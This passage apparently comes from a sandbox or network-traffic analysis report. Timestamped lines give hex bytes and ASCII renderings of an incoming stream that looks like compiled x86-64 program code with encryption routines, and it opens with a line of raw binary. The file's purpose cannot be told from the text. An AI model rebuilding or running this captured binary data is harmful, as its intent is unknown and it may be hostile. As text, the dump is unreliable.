KH[H"ExHnLf0G$.HL!I)IHLLH~RH4LIMIAIM!M9wHIHL!LbL2M9w$Hl$XH`LjH$IM!ILT$H\|$
2022-11-07 22:48:53 UTC	784	IN	Data Raw: 69 bd f8 ff 48 8b 44 24 18 48 8b 4c 24 20 48 c7 84 24 e0 00 00 00 00 00 00 00 0f 57 c0 0f 11 84 24 e8 00 00 00 48 89 84 24 f8 00 00 00 48 89 8c 24 00 01 00 00 48 8b ac 24 a0 00 00 00 48 81 c4 a8 00 00 00 c3 48 89 f0 0f 1f 44 00 00 e9 4a fe ff ff 84 db 48 89 d6 e9 21 fe ff ff 48 8d 7a ff 48 85 fa 0f 85 7c 00 00 00 48 0f bc fa 48 83 e7 07 48 8d 42 ff b9 41 00 00 00 eb 11 40 88 74 0c 56 48 89 f9 49 d3 e8 4c 89 c6 4c 89 c9 48 39 f2 77 2b 49 89 f0 48 21 c6 48 83 fe 24 0f 83 1f 01 00 00 4c 8d 49 ff 4c 8d 15 24 78 22 00 42 0f b6 34 16 49 83 f9 41 72 c4 e9 f7 00 00 00 48 8d 41 ff 48 8d 15 09 78 22 00 0f b6 14 16 90 48 83 f8 41 0f 83 d3 00 00 00 88 54 0c 56 84 db 48 89 c6 e9 98 fd ff ff b8 41 00 00 00 eb 0b 40 88 74 0c 56 48 89 d6 48 89 fa 48 39 f2 77 3a 48 89 c1 Data Ascii: iHD$HL$ H$W$H$H$H$HHDJH!HzH\|HHHBA@tVHILLH9w+IH!H$LIL$x"B4IArHAHx"HATVHA@tVHHH9w:H
2022-11-07 22:48:53 UTC	800	IN	Data Raw: 48 8b 44 24 50 48 89 44 24 08 48 8b 4c 24 58 48 89 4c 24 10 e8 94 30 f4 ff 48 8b 44 24 18 48 8b 4c 24 20 80 7c 24 28 00 75 5d 48 8b 44 24 50 48 85 c0 74 04 48 8b 40 08 48 89 44 24 30 48 8b 44 24 58 48 89 44 24 38 48 8b 44 24 30 90 48 85 c0 74 2f 48 8d 0d f4 79 27 00 48 8b 49 58 48 89 04 24 ff d1 48 8b 44 24 10 48 8b 4c 24 08 48 89 4c 24 60 48 89 44 24 68 48 8b 6c 24 40 48 83 c4 48 c3 31 c9 31 c0 eb d2 48 8b 40 18 48 89 0c 24 ff d0 48 8b 44 24 08 48 8b 4c 24 10 48 89 44 24 60 48 89 4c 24 68 48 8b 6c 24 40 48 83 c4 48 c3 e8 b9 01 fa ff e9 14 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 76 7c 48 83 ec 40 48 89 6c 24 38 48 8d 6c 24 38 48 8b 44 24 48 48 8b 08 48 8b 40 08 48 89 Data Ascii: HD$PHD$HL$XHL$0HD$HL$ \|$(u]HD$PHtH@HD$0HD$XHD$8HD$0Ht/Hy'HIXH$HD$HL$HL$`HD$hHl$@HH11H@H$HD$HL$HD$`HL$hHl$@HHeH%(HH;av\|H@Hl$8Hl$8HD$HHH@H
2022-11-07 22:48:53 UTC	816	IN	Data Raw: 20 48 8b 4c 24 58 0f 1f 80 00 00 00 00 48 39 4c 24 18 74 18 c6 84 24 20 02 00 00 00 48 8b ac 24 f0 01 00 00 48 81 c4 f8 01 00 00 c3 48 89 0c 24 48 8b 8c 24 80 00 00 00 48 89 4c 24 08 48 89 44 24 10 e8 66 7b f3 ff 80 7c 24 18 00 90 74 c5 0f 57 c0 0f 11 84 24 a8 00 00 00 0f 11 84 24 b8 00 00 00 0f 11 84 24 c8 00 00 00 48 c7 84 24 d8 00 00 00 00 00 00 00 48 8d bc 24 e0 00 00 00 48 8d 7f d0 66 0f 1f 84 00 00 00 00 00 66 90 48 89 6c 24 f0 48 8d 6c 24 f0 e8 2d e5 f9 ff 48 8b 6d 00 48 8d 84 24 d8 00 00 00 48 89 84 24 b8 00 00 00 e8 f8 4d f8 ff 8b 04 24 89 84 24 b4 00 00 00 48 8b 44 24 70 48 89 04 24 48 8b 44 24 78 48 89 44 24 08 48 8b 44 24 50 48 89 44 24 10 48 8b 44 24 60 48 89 44 24 18 48 8b 44 24 68 48 89 44 24 20 48 8b 44 24 48 48 89 44 24 28 48 8d 84 24 a8 Data Ascii: HL$XH9L$t$ H$HH$H$HL$HD$f{\|$tW$$$H$H$HffHl$Hl$-HmH$H$M$$HD$pH$HD$xHD$HD$PHD$HD$`HD$HD$hHD$ HD$HHD$(H$
2022-11-07 22:48:53 UTC	832	IN	Data Raw: 48 8b 9c 24 28 01 00 00 48 89 5c 24 08 48 c1 e0 03 48 89 44 24 10 e8 52 ac f9 ff 48 8b 84 24 c8 00 00 00 48 8d 48 01 48 8b 94 24 d8 00 00 00 48 39 ca 0f 82 33 01 00 00 48 8b 9c 24 40 01 00 00 48 8b b4 24 a0 00 00 00 48 89 34 c3 4c 8b 84 24 b8 00 00 00 4d 8d 48 01 4c 8b 94 24 b0 00 00 00 4d 39 ca 72 7a 48 8b bc 24 18 01 00 00 49 c1 e0 05 4a 89 4c 07 10 4a 89 54 07 18 4e 8d 1c 07 4e 8d 24 07 4d 8d 64 24 08 83 3d ae 89 41 00 00 75 2c 4c 8b 9c 24 48 01 00 00 4e 89 1c 07 4a 89 5c 07 08 0f b6 5c 24 7e 48 8b 84 24 e8 00 00 00 4c 89 d1 4c 89 ca 48 89 fe e9 fd fc ff ff 48 89 f9 4c 89 df 4c 8b 84 24 48 01 00 00 66 90 e8 7b 9f f9 ff 4c 89 e7 e8 33 9f f9 ff 48 89 cf eb c3 48 89 9c 24 f8 00 00 00 48 89 8c 24 90 00 00 00 48 89 94 24 98 00 00 00 48 8d 05 0f c1 1d 00 48 Data Ascii: H$(H\$HHD$RH$HHH$H93H$@H$H4L$MHL$M9rzH$IJLJTNN$Md$=Au,L$HNJ\\$~H$LLHHLL$Hf{L3HH$H$H$HH
2022-11-07 22:48:53 UTC	848	IN	Data Raw: 54 24 10 48 89 5c 24 18 48 89 74 24 20 e8 3b 7a f7 ff 4c 8b 44 24 28 48 8b 5c 24 38 48 8b 44 24 58 48 8b 8c 24 00 01 00 00 48 8b 54 24 48 48 8b 74 24 70 eb a8 48 89 d6 e9 f2 fc ff ff 81 e7 ff 7f 00 00 44 0f b7 4e 30 44 01 cf 48 01 c6 0f b7 cf 49 39 c9 0f 87 91 00 00 00 4c 29 c9 48 89 c8 48 f7 d9 49 c1 e1 03 48 c1 f9 3f 49 21 c9 4a 8d 0c 0e e9 8a fc ff ff b8 38 00 00 00 e9 6d fc ff ff 48 8d 05 05 7b 1b 00 48 89 04 24 4c 89 44 24 08 48 89 7c 24 10 48 89 5c 24 18 48 89 54 24 20 e8 a8 79 f7 ff 4c 8b 44 24 28 48 8b 44 24 30 48 8b 5c 24 38 48 8d 50 01 48 8b b4 24 20 01 00 00 48 8b 7c 24 48 e9 0c fc ff ff 48 8d 3c 30 48 81 fa 00 00 10 00 77 1c 89 d0 48 89 f9 e9 4f f8 ff ff b8 38 00 00 00 e9 34 f8 ff ff 44 89 c8 e8 da 63 f9 ff bb 00 00 10 00 e8 70 63 f9 ff 90 e8 Data Ascii: T$H\$Ht$ ;zLD$(H\$8HD$XH$HT$HHt$pHDN0DHI9L)HHIH?I!J8mH{H$LD$H\|$H\$HT$ yLD$(HD$0H\$8HPH$ H\|$HH<0HwHO84Dcpc
2022-11-07 22:48:53 UTC	864	IN	Data Raw: 10 0f 86 6c 01 00 00 48 83 ec 38 48 89 6c 24 30 48 8d 6c 24 30 48 8b 44 24 50 48 a9 60 00 00 00 0f 84 ee 00 00 00 48 89 04 24 0f 1f 00 e8 1b d8 ff ff 90 48 8b 44 24 50 48 83 e0 1f 48 83 f8 17 74 5e 48 89 44 24 20 e8 61 d5 ff ff 48 8b 04 24 48 89 44 24 28 48 8b 4c 24 08 48 89 4c 24 18 48 8d 15 67 40 1d 00 48 89 14 24 0f 1f 00 e8 bb 5d f3 ff 48 8b 7c 24 08 48 8b 44 24 18 48 89 47 08 83 3d b6 09 41 00 00 66 0f 1f 44 00 00 0f 85 90 00 00 00 48 8b 44 24 28 48 89 07 e9 92 00 00 00 48 8b 44 24 40 48 89 04 24 0f 1f 40 00 e8 7b 5d ff ff 48 8b 44 24 08 48 8b 4c 24 10 48 8b 80 98 00 00 00 48 89 0c 24 ff d0 48 83 7c 24 08 08 0f 85 7d 00 00 00 48 8b 44 24 60 48 8b 7c 24 48 48 89 47 08 48 8b 44 24 68 48 89 47 10 83 3d 4a 09 41 00 00 75 12 48 8b 44 24 58 48 89 07 48 8b Data Ascii: lH8Hl$0Hl$0HD$PH`H$HD$PHHt^HD$ aH$HD$(HL$HL$Hg@H$]H\|$HD$HG=AfDHD$(HHD$@H$@{]HD$HL$HH$H\|$}HD$`H\|$HHGHD$hHG=JAuHD$XHH
2022-11-07 22:48:53 UTC	880	IN	Data Raw: 00 48 8b 6c 24 18 48 83 c4 20 c3 48 8d 05 bb 00 1d 00 48 89 04 24 e8 12 1e f3 ff 48 8b 44 24 08 48 c7 40 08 13 00 00 00 48 8d 0d a7 8e 20 00 48 89 08 48 8b 4c 24 10 48 89 48 10 48 8d 0d 0b a4 1b 00 48 89 0c 24 48 89 44 24 08 66 90 e8 1b b8 f5 ff 48 8d 05 74 00 1d 00 48 89 04 24 e8 cb 1d f3 ff 48 8b 44 24 08 48 c7 40 08 13 00 00 00 48 8d 0d 60 8e 20 00 48 89 08 48 8b 4c 24 10 48 89 48 10 48 8d 0d c4 a3 1b 00 48 89 0c 24 48 89 44 24 08 e8 d6 b7 f5 ff 90 e8 d0 c1 f8 ff e9 cb fd ff ff cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 76 4c 48 83 ec 28 48 89 6c 24 20 48 8d 6c 24 20 48 8b 42 08 48 8b 4c 24 38 48 39 4a 10 74 10 31 c0 88 44 24 40 48 8b 6c 24 20 48 83 c4 28 c3 48 8b 54 24 30 48 89 14 24 48 89 44 24 08 48 Data Ascii: Hl$H HH$HD$H@H HHL$HHHH$HD$fHtH$HD$H@H` HHL$HHHH$HD$eH%(HH;avLH(Hl$ Hl$ HBHL$8H9Jt1D$@Hl$ H(HT$0H$HD$H
2022-11-07 22:48:53 UTC	896	IN	Data Raw: 4c 8b a4 24 a0 00 00 00 eb 43 49 89 d2 49 29 ca 49 29 c8 4d 89 d5 49 f7 da 49 c1 fa 3f 49 21 ca 4c 8b 74 24 58 4f 8d 0c 16 49 89 fc 49 89 f3 48 89 cf 4c 89 f6 4d 89 ea 4c 89 c0 48 89 d9 49 89 d0 48 8b 5c 24 70 0f 1f 80 00 00 00 00 48 85 c9 0f 8e 22 01 00 00 4c 8b 6b 10 4d 39 d5 0f 87 b1 01 00 00 4d 39 e5 0f 87 9d 01 00 00 4c 89 a4 24 a0 00 00 00 48 89 8c 24 98 00 00 00 4c 89 9c 24 90 00 00 00 4c 89 54 24 50 48 89 84 24 80 00 00 00 4c 89 4c 24 58 4c 89 0c 24 4c 89 6c 24 08 4c 89 54 24 10 4c 89 5c 24 18 4c 89 6c 24 20 4c 89 64 24 28 48 89 74 24 30 48 89 7c 24 38 4c 89 44 24 40 e8 c6 2a 00 00 48 8b 44 24 70 48 8b 48 10 48 8b 54 24 50 48 39 d1 0f 87 26 01 00 00 48 8b 18 48 8b 70 08 48 8b 5b 28 48 89 34 24 48 8b 74 24 58 48 89 74 24 08 48 89 4c 24 10 48 89 54 Data Ascii: L$CII)I)MII?I!Lt$XOIIHLMLHIH\$pH"LkM9M9L$H$L$LT$PH$LL$XL$Ll$LT$L\$Ll$ Ld$(Ht$0H\|$8LD$@*HD$pHHHT$PH9&HHpH[(H4$Ht$XHt$HL$HT
2022-11-07 22:48:53 UTC	912	IN	Data Raw: 14 1f c1 e2 18 41 c1 ea 10 45 0f b6 d2 45 0f b6 14 1a 41 c1 e2 10 44 09 d2 c1 ee 08 40 0f b6 f6 0f b6 34 1e c1 e6 08 09 f2 40 0f b6 f7 0f b6 1c 1e 09 d3 4d 39 f1 0f 86 86 00 00 00 47 33 1c b0 49 8d 46 01 4c 39 c8 73 71 47 33 6c b0 04 49 8d 46 02 4c 39 c8 73 5b 47 33 64 b0 08 49 8d 46 03 4c 39 c8 73 45 43 33 5c b0 0c 48 8b 4c 24 50 48 83 f9 0f 76 2b 90 41 0f cb 48 8b 44 24 48 44 89 18 90 41 0f cd 44 89 68 04 90 41 0f cc 44 89 60 08 0f cb 89 58 0c 48 8b 6c 24 20 48 83 c4 28 c3 b8 0f 00 00 00 e8 c3 62 f8 ff 4c 89 c9 e8 bb 62 f8 ff 4c 89 c9 e8 b3 62 f8 ff 4c 89 c9 e8 ab 62 f8 ff 4c 89 f0 4c 89 c9 0f 1f 44 00 00 e8 9b 62 f8 ff 48 89 d0 4c 89 c9 e8 90 62 f8 ff 48 89 d8 4c 89 c9 e8 85 62 f8 ff 48 89 f8 4c 89 c9 e8 7a 62 f8 ff 4c 89 f0 4c 89 c9 e8 6f 62 f8 ff b8 Data Ascii: AEEAD@4@M9G3IFL9sqG3lIFL9s[G3dIFL9sEC3\HL$PHv+AHD$HDADhAD`XHl$ H(bLbLbLbLLDbHLbHLbHLzbLLob
2022-11-07 22:48:53 UTC	928	IN	Data Raw: ef c3 f3 45 0f 6f de 66 45 0f 3a 44 d8 01 66 45 0f 70 c0 4e 66 45 0f ef c3 f3 45 0f 6f de 66 45 0f 3a 44 d8 01 66 45 0f 70 c0 4e 66 45 0f ef c3 66 45 0f ef c1 f3 0f 6f 04 24 41 83 c2 01 45 89 d3 45 31 e3 41 0f cb 44 89 5c 24 0c 66 0f 38 dc c1 66 0f 38 dc c2 66 0f 38 dc c3 66 0f 38 dc c4 66 0f 38 dc c5 66 0f 38 dc c6 66 0f 38 dc c7 f3 44 0f 6f 98 80 00 00 00 66 41 0f 38 dc c3 f3 44 0f 6f 98 90 00 00 00 66 41 0f 38 dc c3 f3 44 0f 6f 98 a0 00 00 00 49 83 fd 0c 72 3e 66 41 0f 38 dc c3 f3 44 0f 6f 98 b0 00 00 00 66 41 0f 38 dc c3 f3 44 0f 6f 98 c0 00 00 00 74 1e 66 41 0f 38 dc c3 f3 44 0f 6f 98 d0 00 00 00 66 41 0f 38 dc c3 f3 44 0f 6f 98 e0 00 00 00 66 41 0f 38 dd c3 66 41 0f ef c4 f3 0f 7f 06 48 8d 76 10 48 8d 52 10 e9 92 fe ff ff 4d 85 c9 0f 84 81 01 00 00 Data Ascii: EofE:DfEpNfEEofE:DfEpNfEfEo$AEE1AD\$f8f8f8f8f8f8f8DofA8DofA8DoIr>fA8DofA8DotfA8DofA8DofA8fAHvHRM
2022-11-07 22:48:53 UTC	944	IN	Data Raw: 24 10 44 00 00 00 48 89 44 24 18 48 89 4c 24 20 66 c7 44 24 28 22 00 c6 44 24 2a 00 e8 4c 82 fd ff 48 8b 44 24 30 48 8b 4c 24 38 48 8b 54 24 40 48 8b 9c 24 88 00 00 00 48 89 1c 24 48 89 44 24 08 48 89 4c 24 10 48 89 54 24 18 66 90 e8 bb e4 ff ff eb 92 48 89 4c 24 48 48 89 44 24 70 48 89 04 24 48 89 4c 24 08 e8 41 93 fd ff 80 7c 24 10 00 75 17 48 8b 44 24 70 48 8b 4c 24 48 48 8b 94 24 88 00 00 00 e9 f2 fe ff ff 48 8d 44 24 50 48 89 04 24 48 8d 05 0b 41 1f 00 48 89 44 24 08 48 c7 44 24 10 01 00 00 00 48 8b 4c 24 70 48 89 4c 24 18 48 8b 4c 24 48 48 89 4c 24 20 48 89 44 24 28 48 c7 44 24 30 01 00 00 00 0f 1f 00 e8 1b 3b f6 ff 48 8b 44 24 38 48 8b 4c 24 40 48 8b 94 24 88 00 00 00 48 89 14 24 48 89 44 24 08 48 89 4c 24 10 e8 76 e7 ff ff 48 8b 6c 24 78 48 83 ec Data Ascii: $DHD$HL$ fD$("D$*LHD$0HL$8HT$@H$H$HD$HL$HT$fHL$HHD$pH$HL$A\|$uHD$pHL$HH$HD$PH$HAHD$HD$HL$pHL$HL$HHL$ HD$(HD$0;HD$8HL$@H$H$HD$HL$vHl$xH
2022-11-07 22:48:53 UTC	960	IN	Data Raw: fe ff ff 48 8b 9c 24 80 00 00 00 66 90 e8 fb 9f f7 ff e9 8a fe ff ff 48 8d 05 6f bb 19 00 48 89 04 24 48 89 5c 24 08 48 89 4c 24 10 48 89 54 24 18 4c 89 44 24 20 e8 12 ba f5 ff 48 8b 5c 24 28 48 8b 54 24 38 48 8b 44 24 60 48 8b b4 24 d0 00 00 00 e9 d3 fd ff ff e8 b1 9f f7 ff e9 b5 fd ff ff 48 89 4c 24 58 48 8d 35 20 bb 19 00 48 89 34 24 48 89 5c 24 08 48 89 44 24 10 48 89 54 24 18 48 89 4c 24 20 e8 c3 b9 f5 ff 48 8b 5c 24 28 48 8b 54 24 38 48 8b 44 24 60 48 8b 4c 24 58 48 8b bc 24 a8 00 00 00 e9 2b fd ff ff 66 90 e8 9b 9f f7 ff e9 e0 fc ff ff 48 89 5c 24 60 48 89 54 24 58 48 8d 05 c5 ba 19 00 48 89 04 24 4c 89 44 24 08 48 89 54 24 10 48 89 74 24 18 48 89 5c 24 20 e8 68 b9 f5 ff 4c 8b 44 24 28 48 8b 74 24 38 48 8b 44 24 40 48 8b 4c 24 78 48 8b 54 24 58 48 Data Ascii: H$fHoH$H\$HL$HT$LD$ H\$(HT$8HD$`H$HL$XH5 H4$H\$HD$HT$HL$ H\$(HT$8HD$`HL$XH$+fH\$`HT$XHH$LD$HT$Ht$H\$ hLD$(Ht$8HD$@HL$xHT$XH
2022-11-07 22:48:53 UTC	976	IN	Data Raw: 7c ff ff ff e8 04 60 f7 ff 0f 1f 40 00 e9 44 ff ff ff 48 89 4c 24 48 48 89 44 24 40 48 8d 35 6a 7b 19 00 48 89 34 24 48 89 5c 24 08 48 89 44 24 10 48 89 54 24 18 48 89 4c 24 20 e8 0d 7a f5 ff 48 8b 5c 24 28 48 8b 54 24 38 48 8b 44 24 40 48 8b 4c 24 48 48 8b 7c 24 60 e9 d8 fe ff ff e8 0a 42 f7 ff e9 85 fe ff ff cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 8d 44 24 a0 48 3b 41 10 0f 86 67 11 00 00 48 81 ec e0 00 00 00 48 89 ac 24 d8 00 00 00 48 8d ac 24 d8 00 00 00 48 8b bc 24 e8 00 00 00 c6 87 b0 00 00 00 00 48 8b 9c 24 f8 00 00 00 48 8b b4 24 f0 00 00 00 31 c0 31 c9 e9 44 01 00 00 48 ff c0 48 39 d8 7d 11 0f 83 10 11 00 00 44 0f b6 04 06 41 80 f8 25 75 e7 48 89 4c 24 68 0f 1f 40 00 48 39 c2 0f 8c 37 0f 00 00 48 39 d8 0f 8d 20 0f 00 00 Data Ascii: \|`@DHL$HHD$@H5j{H4$H\$HD$HT$HL$ zH\$(HT$8HD$@HL$HH\|$`BeH%(HHD$H;AgHH$H$H$H$H$11DHH9}DA%uHL$h@H97H9
2022-11-07 22:48:53 UTC	992	IN	Data Raw: 00 4c 89 58 08 0f b6 13 88 10 c6 00 00 48 8b 94 24 98 00 00 00 48 85 d2 74 65 48 85 c9 0f 85 75 01 00 00 90 48 8b 42 08 48 8b 4a 10 48 8b 5a 18 48 89 04 24 48 89 4c 24 08 48 89 5c 24 10 48 c7 44 24 18 00 00 00 00 e8 41 32 00 00 48 8b 44 24 28 48 8b 4c 24 30 48 8b 54 24 20 48 8b 9c 24 98 00 00 00 48 89 43 10 48 89 4b 18 83 3d cb 09 3f 00 00 0f 85 12 01 00 00 48 89 53 08 c6 03 00 48 8b 84 24 a0 00 00 00 48 85 c0 74 66 48 8b 4c 24 48 48 85 c9 0f 85 83 00 00 00 90 48 8b 48 08 48 8b 50 10 48 8b 58 18 48 89 0c 24 48 89 54 24 08 48 89 5c 24 10 48 c7 44 24 18 00 00 00 00 e8 ca 31 00 00 48 8b 44 24 28 48 8b 4c 24 30 48 8b 54 24 20 48 8b 9c 24 a0 00 00 00 48 89 43 10 48 89 4b 18 83 3d 54 09 3f 00 00 75 27 48 89 53 08 c6 03 00 48 8b 84 24 90 00 00 00 48 89 84 24 b8 Data Ascii: LXH$HteHuHBHJHZH$HL$H\$HD$A2HD$(HL$0HT$ H$HCHK=?HSH$HtfHL$HHHHHPHXH$HT$H\$HD$1HD$(HL$0HT$ H$HCHK=T?u'HSH$H$
2022-11-07 22:48:53 UTC	1008	IN	Data Raw: 54 24 18 48 89 74 24 20 48 8b bc 24 88 00 00 00 48 89 7c 24 28 48 89 5c 24 30 e8 8e bb 00 00 48 8b 44 24 38 48 8b 4c 24 48 48 8b 54 24 68 48 39 d1 73 2d 48 8b 5c 24 60 48 89 04 cb 48 8b 84 24 98 00 00 00 48 8b 8c 24 90 00 00 00 48 8b 54 24 40 e9 30 ff ff ff 48 8b 6c 24 50 48 83 c4 58 c3 48 89 c8 48 89 d1 e8 02 e3 f6 ff 48 89 d0 48 89 f9 e8 b7 e3 f6 ff 48 89 f9 4c 89 c2 e8 6c e3 f6 ff e8 67 e3 f6 ff 90 e8 e1 c1 f6 ff 90 e9 7b fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 8d 44 24 e0 48 3b 41 10 0f 86 e7 04 00 00 48 81 ec a0 00 00 00 48 89 ac 24 98 00 00 00 48 8d ac 24 98 00 00 00 48 8b 8c 24 10 01 00 00 48 8b 84 24 c8 00 00 00 48 39 c1 0f 85 96 04 00 00 48 8b 9c Data Ascii: T$Ht$ H$H\|$(H\$0HD$8HL$HHT$hH9s-H\$`HH$H$HT$@0Hl$PHXHHHHHLlg{eH%(HHD$H;AHH$H$H$H$H9H
2022-11-07 22:48:53 UTC	1024	IN	Data Raw: 48 89 94 24 90 00 00 00 48 8b 9c 24 b8 00 00 00 48 89 1c 24 48 8b 74 24 68 48 89 74 24 08 48 8b 7c 24 70 48 89 7c 24 10 48 89 5c 24 18 48 89 74 24 20 48 89 7c 24 28 4c 8b 84 24 a0 00 00 00 4c 89 44 24 30 e8 24 7a 00 00 48 8b 84 24 b8 00 00 00 48 89 04 24 48 8b 44 24 68 48 89 44 24 08 48 8b 44 24 70 48 89 44 24 10 0f 1f 40 00 e8 bb b1 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 8b 9c 24 d0 00 00 00 48 89 9c 24 48 01 00 00 48 8b 9c 24 98 00 00 00 48 89 9c 24 50 01 00 00 48 8b 9c 24 90 00 00 00 48 89 9c 24 58 01 00 00 48 89 84 24 60 01 00 00 48 89 8c 24 68 01 00 00 48 89 94 24 70 01 00 00 48 8b ac 24 d8 00 00 00 48 81 c4 e0 00 00 00 c3 48 89 14 24 48 89 7c 24 08 48 89 44 24 10 48 89 5c 24 18 48 89 4c 24 20 4c 89 44 24 28 48 8b b4 24 c8 00 00 00 48 Data Ascii: H$H$H$Ht$hHt$H\|$pH\|$H\$Ht$ H\|$(L$LD$0$zH$H$HD$hHD$HD$pHD$@HD$HL$ HT$(H$H$HH$H$PH$H$XH$`H$hH$pH$HH$H\|$HD$H\$HL$ LD$(H$H
2022-11-07 22:48:53 UTC	1040	IN	Data Raw: 18 48 89 4c 24 20 48 89 54 24 28 66 90 e8 5b a9 ff ff 48 8b 44 24 30 48 89 84 24 28 01 00 00 48 8b 4c 24 38 48 89 8c 24 00 01 00 00 48 8b 54 24 40 48 89 94 24 d8 00 00 00 48 8b 9c 24 18 01 00 00 48 89 1c 24 48 8b 9c 24 a8 00 00 00 48 89 5c 24 08 48 8b 9c 24 b0 00 00 00 48 89 5c 24 10 48 8b 9c 24 20 01 00 00 48 89 5c 24 18 48 8b 9c 24 d0 00 00 00 48 89 5c 24 20 48 8b 9c 24 c8 00 00 00 48 89 5c 24 28 48 8b 9c 24 18 03 00 00 48 89 5c 24 48 48 8b b4 24 20 03 00 00 48 89 74 24 50 48 8b bc 24 28 03 00 00 48 89 7c 24 58 e8 1b b6 ff ff 48 8b 44 24 78 48 89 84 24 18 01 00 00 48 8b 8c 24 80 00 00 00 48 89 8c 24 a8 00 00 00 48 8b 94 24 88 00 00 00 48 89 94 24 b0 00 00 00 48 8b 5c 24 60 48 8b 74 24 68 48 8b 7c 24 70 48 89 1c 24 48 89 74 24 08 48 89 7c 24 10 48 89 44 Data Ascii: HL$ HT$(f[HD$0H$(HL$8H$HT$@H$H$H$H$H\$H$H\$H$ H\$H$H\$ H$H\$(H$H\$HH$ Ht$PH$(H\|$XHD$xH$H$H$H$H$H\$`Ht$hH\|$pH$Ht$H\|$HD
2022-11-07 22:48:53 UTC	1056	IN	Data Raw: eb fe ff 48 8b 44 24 50 48 89 04 24 48 89 44 24 08 48 8d 4c 24 58 48 89 4c 24 10 e8 4d ee fe ff 48 8b 84 24 88 00 00 00 48 8b 48 10 48 8b 54 24 50 48 89 14 24 48 89 54 24 08 48 89 4c 24 10 e8 69 eb fe ff 48 8b 84 24 88 00 00 00 48 8b 00 48 8b 4c 24 50 48 89 0c 24 48 89 4c 24 08 48 89 44 24 10 e8 26 f5 fe ff 48 8b 44 24 50 48 89 84 24 98 00 00 00 48 8b 6c 24 78 48 83 ec 80 c3 e8 ea 01 f6 ff e9 65 fe ff ff cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 79 01 00 00 48 83 ec 50 48 89 6c 24 48 48 8d 6c 24 48 48 8b 44 24 60 48 83 78 10 00 0f 85 40 01 00 00 31 c9 66 0f 1f 44 00 00 48 85 c9 0f 8d 06 01 00 00 b9 01 00 00 00 84 c9 74 0f c6 44 24 70 00 48 8b 6c 24 48 48 83 c4 50 c3 48 8b 4c 24 68 48 83 79 10 00 0f 85 c2 00 00 00 31 Data Ascii: HD$PH$HD$HL$XHL$MH$HHHT$PH$HT$HL$iH$HHL$PH$HL$HD$&HD$PH$Hl$xHeeH%(HH;ayHPHl$HHl$HHD$`Hx@1fDHtD$pHl$HHPHL$hHy1
2022-11-07 22:48:53 UTC	1072	IN	Data Raw: fd ff ff e8 65 c2 f5 ff 0f 1f 44 00 00 e9 db fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 44 24 08 48 89 44 24 70 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 8d 44 24 80 48 3b 41 10 0f 86 c8 02 00 00 48 81 ec 00 01 00 00 48 89 ac 24 f8 00 00 00 48 8d ac 24 f8 00 00 00 48 8b 84 24 70 01 00 00 48 83 78 10 00 0f 85 83 02 00 00 31 c9 48 85 c9 0f 8d 49 02 00 00 b9 01 00 00 00 84 c9 74 18 c6 84 24 80 01 00 00 00 48 8b ac 24 f8 00 00 00 48 81 c4 00 01 00 00 c3 48 8b 8c 24 78 01 00 00 48 83 79 10 00 0f 85 fa 01 00 00 31 d2 48 85 d2 7c ce 48 8b 84 24 08 01 00 00 48 8b 00 48 89 0c 24 48 89 44 24 08 e8 58 b7 fe ff 48 83 7c 24 10 00 7d ad 0f 57 Data Ascii: eDHD$HD$peH%(HHD$H;AHH$H$H$pHx1HIt$H$HH$xHy1H\|H$HH$HD$XH\|$}W
2022-11-07 22:48:53 UTC	1088	IN	Data Raw: 48 c7 84 24 90 04 00 00 04 00 00 00 48 c7 84 24 98 04 00 00 24 00 00 00 48 89 b4 24 a0 04 00 00 48 c7 84 24 a8 04 00 00 04 00 00 00 48 c7 84 24 b0 04 00 00 10 00 00 00 48 89 9c 24 b8 04 00 00 48 c7 84 24 c0 04 00 00 04 00 00 00 48 c7 84 24 c8 04 00 00 14 00 00 00 31 c0 e9 be 00 00 00 48 89 44 24 58 0f b6 4c 04 6e 48 8d 94 24 c8 01 00 00 48 89 14 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 08 00 00 00 48 89 54 24 18 48 c7 44 24 20 04 00 00 00 48 c7 44 24 28 08 00 00 00 48 89 4c 24 30 e8 e5 43 00 00 48 8b 44 24 58 48 8d 0c 40 48 8b 94 cc 60 02 00 00 48 8b 9c cc 68 02 00 00 48 8b 8c cc 70 02 00 00 48 8d b4 24 c8 01 00 00 48 89 34 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 08 00 00 00 48 89 74 24 18 48 c7 44 24 20 04 00 00 00 48 c7 44 24 28 08 00 00 00 48 Data Ascii: H$H$$H$H$H$H$H$H$1HD$XLnH$H$HD$HD$HT$HD$ HD$(HL$0CHD$XH@H`HhHpH$H4$HD$HD$Ht$HD$ HD$(H
2022-11-07 22:48:53 UTC	1104	IN	Data Raw: f3 0f 7f 62 40 f3 0f 7f 6a 50 c3 cc cc 48 8b 44 24 38 48 8b 7c 24 20 48 8b 54 24 08 66 45 0f ef ff 66 45 0f 76 f6 66 45 0f fa fe 66 44 0f 6e f0 66 45 0f 70 f6 00 66 0f ef c0 66 0f ef c9 66 0f ef d2 66 0f ef db 48 c7 c0 10 00 00 00 f3 45 0f 6f ef f3 45 0f 6f e5 66 45 0f fe ef 66 45 0f 76 e6 f3 0f 6f 27 f3 0f 6f 6f 10 f3 0f 6f 77 20 f3 0f 6f 7f 30 f3 44 0f 6f 47 40 f3 44 0f 6f 4f 50 f3 44 0f 6f 57 60 f3 44 0f 6f 5f 70 48 81 c7 80 00 00 00 66 41 0f db e4 66 41 0f db ec 66 41 0f db f4 66 41 0f db fc f3 45 0f 6f e5 66 45 0f fe ef 66 45 0f 76 e6 66 45 0f db c4 66 45 